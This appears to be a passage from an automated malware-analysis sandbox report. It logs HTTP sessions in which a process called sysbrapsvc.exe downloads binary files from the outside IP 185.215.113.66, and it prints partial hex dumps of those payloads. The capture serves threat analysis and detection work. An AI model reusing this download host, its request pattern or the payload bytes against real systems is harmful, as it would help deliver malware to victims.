                                                                              Data Raw: 2f eb 3b ff 22 8c 9e 7e d6 fa 86 16 25 d6 a1 eb 91 96 d2 6e ab 38 67 1c 3d 47 67 87 68 ce 24 2a dd 8d 07 7d 5e 1e 53 cf 7f 9f bc 53 5d 8e 04 f4 f9 09 4a 15 22 50 da b8 68 9f b3 a6 2d c0 84 94 bb 51 1c 79 b8 aa a0 30 32 32 47 8d 6d c6 9a 54 e9 66 08 fd 3c 2e b3 c9 6e 64 08 31 1f 3f ff cb e3 5e 8e 52 06 1f cf 42 06 a5 8d 78 fa ea fd 6c 47 55 3f a1 8a 36 0c 86 c2 37 a5 0d 96 df 47 6a f5 fa 9a ed d8 93 3c 00 a3 68 3d ee 32 c5 ce 5c c0 ae a1 7a ce 06 9b c4 2e 52 b9 87 a6 d5 8b 39 3e 60 52 51 20 df b6 cc b3 c5 97 33 24 0a 47 ff 73 ac cb 3b c1 25 f9 65 a7 9c 1b 55 78 a9 8a 26 c3 ad f0 c1 e2 6f 5b 1e 78 02 51 ed a0 19 31 a4 eb 64 ee 81 19 3b bb 92 5d 6f 1c dc 69 3e 42 33 60 0f 00 c2 e7 19 a3 9d d8 cd 2d d6 f7 1a 97 fa b6 df d6 69 04 54 0b aa 9f 3e 4d 56 2f 90 eb e5 dc 5f 4d 79 f6 da af 61 e3 70 78 76 42 ab 75 81 3d 29 65 73 41 39 c5 1e 6c 94 fd 3d 7c 17 bc fa 05 70 cd 19 c0 34 4e 24 68 bb ab d4 7f 18 4f 60 99 c0 3b 20 b9 ee e7 94 7e 1a 1a fd 3b e8 a4 77 5f e0 81 37 62 a8 66 c5 b8 b7 c9 32 ef ce 1c 9b 4a e9 [TRUNCATED]
                                                                              Data Ascii: /;"~%n8g=Ggh$*}^SS]J"Ph-Qy022GmTf<.nd1?^RBxlGU?67Gj<h=2\z.R9>`RQ 3$Gs;%eUx&o[xQ1d;]oi>B3`-iT>MV/_MyapxvBu=)esA9l=|p4N$hO`; ~;w_7bf2J6%9K2!PeeQfYwIf5*9Bs:L7-lgw/nlOsk,c$Mt7=PGKN6EDy!Ig6Yt7exU]5{Yl+5ZN'"'zZ}K2~:/U~1\M^lx1M8/50>f{VG%w uVTo=?ZUc~tMto|;q{x]+^(qpmKA<qvv9'b.T/Gp_e,7os?g&|d(v[d}|Xa1jv&B7j\o|N!i/u.,o#/v]1&o3T}l{fKV_E-&!1~uZ0}_+_i|sV!B[@L;;le;fGr<i7DLP`}8y#WqO)h/E^r7QuJ0 [TRUNCATED]
                                                                              May 8, 2024 15:25:26.244623899 CEST1289INData Raw: a0 2d e3 56 4f b5 70 35 f0 87 6d 9a a1 c6 80 d4 8f 8d da 29 da 12 7f 44 65 55 c5 e5 ad 6b 7f 92 1c 16 4c 62 59 24 20 27 a1 4e a6 58 37 f1 d4 4e 3a b8 07 27 be fe 79 d2 0a 4d a3 e9 b3 d3 27 ea 71 3e 45 12 d6 e4 a1 f1 c5 ca 1e dc 0b 6b c4 4d 1d bf
                                                                              Data Ascii: -VOp5m)DeUkLbY$ 'NX7N:'yM'q>EkM2YN JemGZ%>:P@OXW9E:>;n;EK_ptl[}?/EBR -zw{k@/ETJ4CSoD7K)N&)LPl8i:^.;?D
                                                                              May 8, 2024 15:25:26.244657040 CEST1289INData Raw: 34 95 48 63 4a 56 69 1b b6 d0 11 8b 43 3d f9 9b c1 7e ce 35 63 32 b1 a5 bd a2 ce 1d 8c 3c cd 5a 8c 04 19 20 36 cc 80 30 f7 36 0b bb 1c 5d aa ca 75 b1 fb f0 12 10 c5 8d b1 6b da 5c 25 f5 99 66 3a 04 1d 9f 21 83 7b 3f 47 a0 62 23 9e 6d 75 fc 06 13
                                                                              Data Ascii: 4HcJViC=~5c2<Z 606]uk\%f:!{?Gb#mue/bE)Ac,1_zXGl}J ,AoXu=/Tx;sGP'ZECi\ogb)]>JpA7NdI&"=%}w7a
                                                                              May 8, 2024 15:25:26.244734049 CEST1289INData Raw: 22 ee 51 86 c3 82 42 12 1e 23 94 22 31 32 98 d8 93 42 06 bc 3e ab 5a 7e 1b b2 9c 93 cf ed de db 56 ff d1 9a e8 c0 a3 e2 8c 16 0b 5d 25 0a f3 39 83 b8 8e d5 dc dd 2b 93 5a e8 e1 72 b6 41 ca d0 a8 ce 28 87 51 da 7d bc 57 1f 72 5e d5 40 0c 79 f6 6c
                                                                              Data Ascii: "QB#"12B>Z~V]%9+ZrA(Q}Wr^@yl4~n~uqy7Bk0k32[XOjxLve.BivxU8Qj-S,& fV?X#4J#< ^e\':l}btB
                                                                              May 8, 2024 15:25:26.244806051 CEST1289INData Raw: 14 17 af 0e 52 15 bc 73 cd 28 6c 9d fe 63 14 1c 81 15 ba ea f5 f5 b7 18 2c 57 40 8e 55 0c 7a 93 9e 99 9a 75 58 fb 01 95 7d 90 03 43 86 04 d7 af c7 1e 33 a6 17 c0 a6 8c 9d 26 ea af 5b e0 69 e8 2c 10 54 6a b6 4d be 13 63 30 f7 27 ee 68 6a 25 06 d1
                                                                              Data Ascii: Rs(lc,W@UzuX}C3&[i,TjMc0'hj%M>V*w=dfcwo$/n7.^Kfy37Iz[VZLF|%|s79\"%pNl\Rk-</'HQB14.k-!B>1lZ0_
                                                                              May 8, 2024 15:25:26.244923115 CEST1289INData Raw: 35 03 c6 69 a0 71 ee 00 0e a5 c7 7d 33 36 84 19 87 ec 1d 2d 6e 04 a5 fc 51 32 b5 18 97 f4 6e b2 82 9a bc 7e 2e b5 ce 63 92 99 20 a2 65 9f af 42 2a c0 06 b2 b1 5f 51 05 f2 20 e9 91 74 c6 3b 6d f0 ef ad 0c 15 65 45 32 52 e2 3e b3 a4 99 bd da e9 96
                                                                              Data Ascii: 5iq}36-nQ2n~.c eB*_Q t;meE2R>*pLyFU+:&1:PQB\?rumgqeP</;IzfMY;H,bmj{dVT2}-^ZY4]/eVI#/ z?_hX*w
                                                                              May 8, 2024 15:25:26.245007992 CEST1289INData Raw: d8 48 56 8b 5a b8 ab 63 32 07 0b 67 c9 9d d3 d0 75 09 e8 eb e5 85 2b b1 4b 64 12 fb 9c e5 a1 9e 3e 41 f0 08 2b 61 3b be 1e ef f1 0f 7b ff 90 28 db 02 fd 0f f0 e6 ec 08 87 94 5a 41 43 69 77 86 7b 79 28 5c 46 19 4a c0 d4 50 6f 9b 01 a5 ae 12 8d b2
                                                                              Data Ascii: HVZc2gu+Kd>A+a;{(ZACiw{y(\FJPoc,}-$g.j<+aoeO2(SL=[9HB8[s]YA1A/:FE0xJxUX>IWDWa5PH4(ho%q$qp
                                                                              May 8, 2024 15:25:26.245023012 CEST1289INData Raw: 09 b8 2f 79 14 9d ef 6d 09 77 e2 b2 60 84 e0 9b 45 3b 28 02 15 15 9d ee 50 b6 f6 a2 b9 1c 76 7f f6 8e c3 38 89 c2 df 40 2c 53 36 cd b3 d6 ff 35 7b 9a 79 01 e8 17 61 73 47 03 e2 a4 42 20 5c d3 65 07 0a a3 2b f7 e1 65 81 c9 7e 21 47 71 a8 a8 b3 a3
                                                                              Data Ascii: /ymw`E;(Pv8@,S65{yasGB \e+e~!GqKw;)+UXd4lseiezy}(<vaSf>_$eRiZ(,MyrL?BtwUYPwTV/cPUfJcrd
                                                                              May 8, 2024 15:25:26.245037079 CEST1289INData Raw: 38 90 ee eb 04 9b f4 3f 3f 31 b6 f4 34 59 eb 6f 0d 53 13 67 d4 a1 dd c3 95 f8 9d 11 aa 8d 8a b2 7f b6 e2 78 a8 ff 57 39 a8 95 52 70 35 c8 b2 cf 61 5e 07 6e c8 61 4d 84 b3 92 7e 9e 09 75 d9 93 53 13 9b ee 06 d3 75 48 e5 df e6 d0 96 53 bb de 81 4a
                                                                              Data Ascii: 8??14YoSgxW9Rp5a^naM~uSuHSJD>K4!o=zxNE:Mpy?WoQ!vP8K(9G(q>.(#7W}UQ.f~MaQz\ztY7Z0}R]O$\"TjEqjZ_
                                                                              May 8, 2024 15:25:26.245050907 CEST1289INData Raw: 3e b9 6e 66 f4 fb b3 e5 57 91 84 03 4d 3c 75 8e d7 b8 2f 54 26 be a9 d1 85 0b 7e d0 0a 77 d7 05 f5 56 ae ed ef 4e de 31 b6 25 1c e8 ca be e4 f9 b8 c4 c6 5f d6 09 b9 e9 43 fa 6f 7e 6e 7e b7 96 64 d5 3c 37 b6 f3 c8 ac fe 60 12 77 27 ea 10 ec 4a 1f
                                                                              Data Ascii: >nfWM<u/T&~wVN1%_Co~n~d<7`w'JCyKx-WO)fZ<eSz1WZoE2}-S:O:yQzt{Dx/Y0_eP#81n]FaBZx4hY4PE~Z#/kdXf
                                                                              May 8, 2024 15:25:26.584974051 CEST1289INData Raw: 8b b3 71 d9 c8 da 74 f5 6d 13 ab 82 5f 0f d7 2a 75 8b dd 33 63 1c b2 7d 94 1e 26 53 ac e2 1f 13 96 62 30 be f6 91 83 88 02 53 ab 64 26 46 78 9c 5f 55 53 4e e7 85 20 bf 19 62 c8 f4 73 7a 7b f7 95 a5 e0 a7 b3 5f af 93 4b f8 e5 09 51 e9 cb 5b 41 72
                                                                              Data Ascii: qtm_*u3c}&Sb0Sd&Fx_USN bsz{_KQ[Ary#<Fc)aH|!9**kjj?1~_Lc_>c\{LY#w^1d1?2jl&.ln)(An%e{Bj<q=+nG)=W


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              44 | 192.168.2.8 | 49786 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:28.607213974 CEST | 166 | OUT | GET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:28.948611975 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:28 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 15104
                                                                              Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "66299415-3b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4b e8 23 1d 0c 94 79 42 1c 1c 48 97 49 7a 96 f6 a9 d0 37 98 4e 18 a4 bf cd f5 ce 8d 00 4d 6c f6 9f 43 ea c4 50 f3 99 cb 6f 7f 29 ac 33 c1 1e 12 8e 34 8d 95 a7 ea 7c 62 91 62 10 61 f3 ab d4 6a b1 0a 3d 8c 22 70 e0 78 c2 05 ad 0c 8b 93 0b 61 d5 48 27 b5 a2 b1 76 88 94 ff 6e a7 e9 f4 c7 c3 48 3f d7 cf bd f1 a2 8e e1 3f ec 46 4f c8 b8 9d ea b3 ae d7 87 06 73 47 a9 ac 62 e9 fd b0 18 6e 84 ec 0c cc 82 c3 0f 82 5b 02 ec 9d e4 64 88 4f 2c 46 10 a4 dd 63 b7 a7 cf 5a b0 db fe 14 f8 fc 55 50 cc 7c 1d 98 b3 60 c0 ab 71 f8 25 3c 61 53 64 a0 d3 ce 2f 05 a7 f8 76 5a 2c 96 b3 67 78 59 67 17 11 7c b1 fe e0 a8 92 e8 4c 1f 74 26 fa 7b a2 02 92 bd ec 3d 08 ec f4 72 ef a3 d5 25 9e 4d 8d f4 d4 47 a5 08 6f c7 c5 f9 ab c6 e4 bc 48 81 e4 5d 23 c3 79 7c 8c fc ca 58 d2 4c 8c 18 bd e7 fe 22 4a b2 30 ad 4c 30 bd 90 e0 18 d2 77 c0 4a b1 c5 9d 03 c5 97 f3 e7 2d 46 d9 ae 13 86 5f 69 ce 8e 09 a4 95 a5 45 bb 82 e4 74 81 eb d2 3a a2 a1 37 25 c3 bc bd 85 b2 3c 84 47 5f 0e a3 fc ac d5 4b 82 de 1e ec fd 0e df 86 a8 6e 37 43 21 0d cf 8d [TRUNCATED]
                                                                              Data Ascii: K#yBHIz7NMlCPo)34|bbaj="pxaH'vnH??FOsGbn[dO,FcZUP|`q%<aSd/vZ,gxYg|Lt&{=r%MGoH]#y|XL"J0L0wJ-F_iEt:7%<G_Kn7C!XY={GRsw!0l0[!^irP:X$B(<:&axtQL[y<1:8cJi{Cw)Vx&`[gFkW?*(5pnH$~vL%i_oZ4S*~R6.0i[y ?JD!sn9a:z^Ee'4G~*ULV*<`9o8X'.63dd4kiZY!IvK<iH6HmMU>}L&0d{R!A7RZi(";b%Y.0#J2@Bs:g@h{^G<[Y/x6s*eZ8etZ=N.O`-,STepH7[:wf4kE5)Mm{:<tW;?U`y.E*0nk(D}=OLX9i,,a~pYZA/ qD_T.> [TRUNCATED]
                                                                              May 8, 2024 15:25:28.948753119 CEST1289INData Raw: b9 ec 48 5b bc 5c c5 cc 74 49 24 c8 79 28 87 7d 84 00 80 4b 76 48 a4 b5 c0 ff 47 f3 67 e3 7b 80 0f 8a 5f 14 81 b8 50 87 65 ef 85 cb 83 a1 8e f8 3c 60 82 4a 42 41 ed f5 9c d7 f1 6d 7a f0 c4 f6 40 ab 1b b9 0b a9 9f 8f 86 18 c8 d5 0d da 24 be 61 cd
                                                                              Data Ascii: H[\tI$y(}KvHGg{_Pe<`JBAmz@$a3/rB"SGAiD5#kK3"ZKD*6O(!nYA@2o<~&$PeX9As_q|0GRl'fB3CxjHgxQ|
                                                                              May 8, 2024 15:25:28.948767900 CEST1289INData Raw: 45 42 8e 2f e3 a5 18 82 da 03 3a a4 b5 2d a1 cc 37 03 69 95 7d 8f 7b 54 01 71 8e c4 3c 1f 9c 2b ad 07 75 d3 bc 03 00 7d 31 8d c5 42 72 2d 6e 86 18 0e 56 a1 80 c2 b6 5e de 4b 38 06 74 de 9d 2e 9f 49 8a 79 ba 55 46 49 9b d6 40 be 1d a1 f4 bd 0f 33
                                                                              Data Ascii: EB/:-7i}{Tq<+u}1Br-nV^K8t.IyUFI@39^+8"B;cr+=T]*:~uf+]tg]}>F.ez_4:6Mt9Lm`9xtIqMf@&/|F"PM__SEy`f'`.,c#%
                                                                              May 8, 2024 15:25:28.948884010 CEST1289INData Raw: da 8a 40 49 4a f5 3a 1a df 96 c3 5f 0b 5a fc fe 03 4c f2 79 5f f5 de 80 39 49 a1 18 82 83 a3 40 51 3b 3c fe 6c 6c 94 0c b1 5b bc 8b ed d1 7c 5e c4 2e 4e 83 35 ee 93 1e 6d f3 28 c0 26 4d 8e 20 52 43 de 37 80 2d 91 55 16 b0 af ab 19 02 2f 81 e9 0b
                                                                              Data Ascii: @IJ:_ZLy_9I@Q;<ll[|^.N5m(&M RC7-U/VgtXt@*<d5Y*K9G_2T.DsTzyH9H<">e6G{R9NzGGtjLT?+&5Ovx[~UY2&Q'de+RB
                                                                              May 8, 2024 15:25:28.948956013 CEST1289INData Raw: 01 e6 18 ad 0b 22 41 6b 9e 7f 93 1a ff da a3 28 22 08 4f 91 02 a2 0e 21 66 5b a8 47 fe a7 74 30 ea 1c 20 8a e3 83 e5 7a 80 18 1d cc 7e 49 21 86 2a 3c 44 43 ea fd 59 98 ca e1 d0 8f b5 75 78 82 8a e2 00 e7 c3 4f c9 1d f5 00 9e 8f 84 bb b8 d7 09 78
                                                                              Data Ascii: "Ak("O!f[Gt0 z~I!*<DCYuxOx+raM"/t|^0R)P?r\4=fPv59B?CYfFD9BXP?f=.<b9zjQ]N@0~wz)<;Nxh]lZxAA
                                                                              May 8, 2024 15:25:28.949280977 CEST1289INData Raw: 04 9d 4a 4c 14 24 26 c4 de 87 af 70 f7 9a db c5 37 e1 99 d6 4d 49 6e 3c ca 13 32 ce 4f c8 3d cf 9c 75 f7 39 33 ae d0 e9 2e c3 c1 27 ec 8c 48 eb bc fa 18 f5 35 d4 8d 03 53 8f b5 de 92 1f 06 92 3e 7e 86 5d b9 d8 56 a2 d8 bb 5b a8 f8 24 7c e8 af 89
                                                                              Data Ascii: JL$&p7MIn<2O=u93.'H5S>~]V[$|lHU\9UT4,pE.>xUP]&[M8umLoyUv!n<oQ(qsOLTrEkoQ6["xYN*o]82[[]hQk
                                                                              May 8, 2024 15:25:28.949350119 CEST1289INData Raw: 63 4e a9 de 95 aa 2e 7f d9 b7 ec cb 22 f6 3a f9 a9 fd 09 ba af 7a 20 26 53 5c 56 ab b4 12 a3 a3 13 92 a9 a3 b3 b7 88 24 91 fe af b7 4d 6d aa 49 bb 3b db 05 4d dd c1 9a 06 78 f9 2e 80 c3 fd ee c7 0c 12 d1 35 c3 90 49 c3 62 9c f8 2e db 66 5b 23 36
                                                                              Data Ascii: cN.":z &S\V$MmI;Mx.5Ib.f[#6uSmlBs'T,n{77=gQGvZg}_Tvr_TQ.m@e%1h&*UsK{d$kd@BX=j*,Txx.Fu)l7HG
                                                                              May 8, 2024 15:25:28.949364901 CEST1289INData Raw: a7 43 34 40 b4 d0 9d 08 a3 50 0a b7 0e 8f 75 5d a1 9d 97 cc 78 60 14 aa 50 49 87 5f 7b ea 4a 4a 04 07 48 74 6f ee a8 f8 7c 95 fb f1 67 17 5a f6 d7 f5 3c 71 da 95 45 63 ef 40 7e 70 a5 c3 5a 0f a0 c5 39 33 03 56 c5 72 f4 e3 ed 18 af cd ae e2 05 fd
                                                                              Data Ascii: C4@Pu]x`PI_{JJHto|gZ<qEc@~pZ93VrYdDP`<,8TV9qE3aiz840,pNjh,i!Q*NyWIqg6<H]DF*-wT? g
                                                                              May 8, 2024 15:25:28.949412107 CEST1289INData Raw: 8b dc 5d b4 f4 ef ae e9 8f 3d df c4 73 4c a2 43 f5 40 dd b9 c2 9e 4a ef a7 94 46 22 7e eb 9d 07 ef 56 a2 0a 91 2a 3e 19 b0 aa 70 43 27 d6 6e 17 0b 09 a8 fe 7c d8 2b 9f 53 96 84 d4 0e ff 47 5f e5 8b f2 de 76 6c 7c 3f fb 84 77 de 16 ea 81 5a 2f 57
                                                                              Data Ascii: ]=sLC@JF"~V*>pC'n|+SG_vl|?wZ/W>4I(yCg(,)=w6w{lN_D.p{_lt^cp\M?qk$^PRs+J{9{9Tx'0(an_
                                                                              May 8, 2024 15:25:28.949429989 CEST1289INData Raw: 9c f1 66 6e 7b 16 a8 3b cc a9 0c 47 ce e3 93 fd d1 ce 45 51 15 64 a0 9f 8d ee ce b2 f9 a1 2c 7b 24 b5 56 8e 26 03 64 c2 be d2 53 99 5a 89 1a eb 71 e6 8a 6a 4f dd 8a 5f 29 06 34 ae 10 9a 0f b5 2e 71 77 d3 bd 50 59 e2 bf c7 0b ed 0a b9 b6 f0 38 8f
                                                                              Data Ascii: fn{;GEQd,{$V&dSZqjO_)4.qwPY8ZW>j!3 W^aOWAnI90?R+CYwUMvW\u{ZRJXKY'vf?7%D/TH1v:R>$OB%6G"
                                                                              May 8, 2024 15:25:29.292471886 CEST1289INData Raw: cf 2f 9f 00 d6 88 6b aa cc 3c bf 1b 58 09 08 29 f2 9e 1b 4d 03 db b7 da cf 87 ba 63 2d fa 4e 97 8f 36 8e 87 c4 b1 7d 60 4d 1d 39 a5 82 8c 33 69 c1 01 64 ae f2 cc 7e 7b f5 97 a0 ce 47 0a 40 4c 55 28 fa 7a 7e a6 5d ab 44 20 19 20 11 0a 99 8e c4 a8
                                                                              Data Ascii: /k<X)Mc-N6}`M93id~{G@LU(z~]D F r3F4`e)[T!#~SK*|hr+hkvoHY=3+et8-}zg[u1!y\EpE(Ou3zC:]baAzaWk


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              45 | 192.168.2.8 | 49787 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:31.327326059 CEST | 166 | OUT | GET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:31.669333935 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:31 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 81928
                                                                              Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "662995f1-14008"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 f7 01 b2 60 0c 25 58 36 49 b9 34 23 91 28 4e 72 ab 02 06 2a ee b3 46 54 3e 3a 68 4e 47 4a 0c 37 91 b7 a4 1b 38 a1 9a e0 b0 c4 fe 21 20 44 58 a6 82 6d cd 53 58 f1 3b ac 19 89 a1 3d 8b 90 83 b4 71 ef eb 13 7a 28 73 20 51 f4 00 23 77 f7 2b 57 60 82 4a 56 6a 86 65 65 f4 3b 70 d7 7e e1 94 a3 80 aa 9f 61 33 fa c2 5f 90 b0 88 84 2c b5 14 92 38 68 0a 3a f6 a8 e8 70 3c 63 fa 87 27 43 2b f1 17 2e 48 bc 40 39 94 d5 09 2e 37 61 67 27 e3 d9 d7 11 b1 73 b6 44 ee a1 48 67 ce 3b 0d 47 de 6c 49 99 78 8e 32 06 7e cb 06 99 e2 8b b5 22 65 91 47 ca 9b f4 f8 70 e1 34 32 30 ab 66 24 ff 18 2d 2a ab a4 8e 3e 8f 4e 6f f9 37 ff 23 0c bf fa 23 74 76 8a c0 5b 91 ba 64 3c ba 64 84 a9 8a 05 47 f3 ae 16 c6 d5 ac f8 f2 e3 22 12 89 76 35 e9 23 19 da 63 c6 f6 7c eb 00 02 5d a9 90 93 72 c1 57 89 70 e8 c7 c7 ff 7e f7 25 72 e0 5b 68 5a 13 5f db 38 e3 e0 b0 df b4 6c f2 6c 3f 6c 32 2c 82 bf c0 0e 20 00 01 74 e7 94 6e d0 d7 31 4b fa 19 92 fa 71 85 57 70 41 0d c0 65 20 72 73 20 94 9c e7 af b6 92 a0 3f 21 39 04 9a db [TRUNCATED]
                                                                              Data Ascii: NGS!`%X6I4#(Nr*FT>:hNGJ78! DXmSX;=qz(s Q#w+W`JVjee;p~a3_,8h:p<c'C+.H@9.7ag'sDHg;GlIx2~"eGp420f$-*>No7##tv[d<dG"v5#c|]rWp~%r[hZ_8ll?l2, tn1KqWpAe rs ?!9s,i}G:x} M]:wTU+v*@V-7m+j!LqmJmVHiYHq[JG1j\Z+J2[?#fzYV"9(UWIJ's-OW`o0pmRVaj;wm57*iWysesZ5{(|+tDo>DQbd.W}@^=w%}C?2EN4jfi/kOppZ6I$aJ_/028M*J0y!=g[v]c@9d^H2~l(pc-'7JagPYP.mt&/btva}gfu;'Z~[Vn~5RkM@q/:=`:G^'CT<Czv`b=/>&-U|pjM,/fWO4]9D-\F'bOQW`6sb_ [TRUNCATED]
                                                                              May 8, 2024 15:25:31.669538975 CEST1289INData Raw: 28 55 b0 14 8d 25 75 01 4e 4d c0 61 ac 41 b4 b2 02 db 28 1b 34 b9 e4 3d 5a ba a7 41 58 c9 72 51 09 58 06 57 a5 6a 1d a6 dc db 3c 54 91 a4 f0 53 ee c7 b4 4c 31 29 c9 3b 7d 28 06 68 a2 46 ea 8f 96 45 61 a0 bd ec 9d 9e b3 9f b9 6f db 99 91 9e cc ab
                                                                              Data Ascii: (U%uNMaA(4=ZAXrQXWj<TSL1);}(hFEao@@s3poh[Z6~E7Y\YdQ87$>/v2/'jIA*i$ZtBa4PdG5KQ^(,q{:)CYd;}U:
                                                                              May 8, 2024 15:25:31.669554949 CEST1289INData Raw: 73 80 0b b2 b8 b4 ed b4 ec 6c 6e 29 64 94 41 b8 c2 5b fe a0 26 a2 02 7f 86 2b d0 b5 9d 1b c4 eb 99 d1 84 a5 c4 9b e4 4a 3f ae 54 38 64 fd 73 7b bc b0 b7 f7 35 22 98 66 d9 e0 9c 2c 14 4c 63 dd 51 30 2a 35 e5 bd c5 71 38 09 82 3b 49 c8 cb 06 d7 be
                                                                              Data Ascii: sln)dA[&+J?T8ds{5"f,LcQ0*5q8;IW5F_E,`uvybARUBv@5:{sU~wLFy~I3z?>Twh,GY(@5D?39wne5Fud!Ji
                                                                              May 8, 2024 15:25:31.669569016 CEST1289INData Raw: c4 bb 2d ef 3e bc d7 cf 85 b5 61 42 c9 31 64 7b 11 00 a5 c9 ec bc 34 06 66 4e 0f 74 8f 73 02 53 34 4b 68 9c c2 bc c8 87 b4 4d 97 89 8e b7 7d ce 64 8b 08 fe a7 b9 04 ca a1 ad e8 0e 46 11 2f 0b 88 83 36 8f a2 c3 5b d6 10 ae bb 3d d8 38 cf 91 4f ed
                                                                              Data Ascii: ->aB1d{4fNtsS4KhM}dF/6[=8O^b$/lb8nfD;AzN=O'F+~gV#q*(*(%d]d!E)xJ:.Ku[_ofLVQiGA*x
                                                                              May 8, 2024 15:25:31.669584990 CEST1289INData Raw: 47 61 a6 d7 8b e2 18 06 d4 a0 0f 77 f1 a8 b0 18 f4 e7 aa e1 f4 10 d3 6c 24 a6 92 4a 95 43 61 2d 33 b6 ea 6c 67 db 6c f1 95 8b c3 ca 0a d3 82 4b 20 b2 2c 8a 71 ed 28 57 22 b0 3e cf fd 51 37 9e 01 db db 71 df 58 6e e1 04 c1 79 7e b7 1d e7 32 64 68
                                                                              Data Ascii: Gawl$JCa-3lglK ,q(W">Q7qXny~2dhr.1N5dN]YIZ]svq|1bT0T2L>Kk`]H4X"kD/e6o[&/RcKT_N`MGmtocl;-EH-t JbB
                                                                              May 8, 2024 15:25:31.669599056 CEST1289INData Raw: 19 15 22 5a d7 57 6d 08 b4 ae a5 2d 9c 05 b2 e7 76 a1 88 d8 95 a0 92 12 78 8c 9e 84 bb 25 c3 0e ea 62 c0 e8 67 46 ce f2 85 e2 86 aa 56 e3 03 22 c9 e8 1c d4 fd 1d f3 66 d5 d2 6e a9 8f db d2 fb 8e 6c 5a 7c e2 ea 43 e3 75 e5 ab 3a 6b 8b 08 76 b5 e4
                                                                              Data Ascii: "ZWm-vx%bgFV"fnlZ|Cu:kvG\Cd!9s$Wvbc{Lz4p%+2&m=J LE9Kl64H"~c/`J'tSy
                                                                              May 8, 2024 15:25:31.669616938 CEST1289INData Raw: cf ac a7 be eb 73 e4 d3 ed 5b 03 72 0a 74 77 67 b8 06 90 b3 68 26 cd 09 26 77 da e1 de 04 4a 31 c4 2a f5 4e d0 17 74 d1 64 56 8a 35 52 8e a2 c2 49 84 cb d5 ba 8a de 29 c8 64 33 1d ea 1f 9d 54 a4 dc a7 44 ad 90 58 ad 3d ed d8 e9 11 8b bf 96 37 2b
                                                                              Data Ascii: s[rtwgh&&wJ1*NtdV5RI)d3TDX=7+_TDx*dMT&J&XhG0{lwY]u</08I}F?yJxis}{2?FqiI]'Vv0KK'C_`B/E$=k5\$8
                                                                              May 8, 2024 15:25:31.669632912 CEST1289INData Raw: 18 ea 62 90 fb d4 85 d0 ad 0c ca 89 b2 53 60 05 7d 76 96 c6 1b 11 21 ee b4 7a fb 80 51 ed f3 ab 53 d4 03 87 1e e5 51 de b5 72 0c 29 40 27 ef fe 36 61 96 0b 02 9b d9 49 77 04 7e 0b be 98 bd b5 4e 86 ad 27 41 28 99 57 26 9d c5 79 01 3f 69 69 0b 0e
                                                                              Data Ascii: bS`}v!zQSQr)@'6aIw~N'A(W&y?iiz$X2Wq&44o#H<uwV5pWv;}]rxsi3}'/_:4!0EUD7H\l9B-uLr3%3)"iKYw_3b1!]/
                                                                              May 8, 2024 15:25:31.669647932 CEST1289INData Raw: 98 f8 17 51 a5 46 a9 06 8f 70 7e d1 56 4e 09 36 93 48 63 2d e4 5e 59 fe 7f d8 01 fc 73 11 04 eb 66 af 5f 05 e8 fa 5e 30 56 18 e8 12 c0 d7 0f 05 48 45 9f 97 4f b9 c8 ba a5 74 d5 06 3f 27 fd 27 2d af 17 cb 93 d8 14 f2 53 f2 fa 4e 30 b9 7c 59 d9 07
                                                                              Data Ascii: QFp~VN6Hc-^Ysf_^0VHEOt?''-SN0|Ye"I@/&'pz251my 50Ki8HP38FG^ZOEV-sOSBSp1@JlgTJrJg6gGwE\Wg
                                                                              May 8, 2024 15:25:31.669668913 CEST1289INData Raw: 41 d9 38 85 ee da 1f 10 58 78 ef c3 e6 5f 03 31 de e6 ca fb a1 25 b6 07 9d 1b b2 31 a6 4b f2 95 cf 45 5a 45 f9 ea 7f ba c1 4d b7 5b d9 ed 98 aa 58 ac f9 58 2c a7 8c 2a c0 64 76 05 f9 ea 6b 0c 6e a7 cc 9f 95 3a 5f 91 fe 5f 03 e9 99 02 db a3 ae cd
                                                                              Data Ascii: A8Xx_1%1KEZEM[XX,*dvkn:__p:2@{<@W^Y9UaKJ}_{J5J=N2)kF zXlyd}72iZbEkzf2<Meo9"fbuDgI:65+Zn(ylM
                                                                              May 8, 2024 15:25:32.009761095 CEST1289INData Raw: 04 f1 04 68 70 6d 25 a5 24 64 db 9c 1f 55 9b bb d5 7d 93 b6 b0 59 82 37 48 16 39 7d 95 ba d9 9a 0c e1 8a 9d ec 79 73 e1 b9 9e 01 ac 65 4e 76 07 47 59 6c eb 1a d5 8b f7 6c ba 2b bc 78 f5 54 f8 96 58 43 5d af 42 06 be 91 8b 5c d1 3e 11 89 bf 48 2b
                                                                              Data Ascii: hpm%$dU}Y7H9}yseNvGYll+xTXC]B\>H+8Y?vROQT$O<8c8]>!nxQt1K=Tm`loww?#@!C9/WHO+Rnym:|5`Dd{K/(Y?
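
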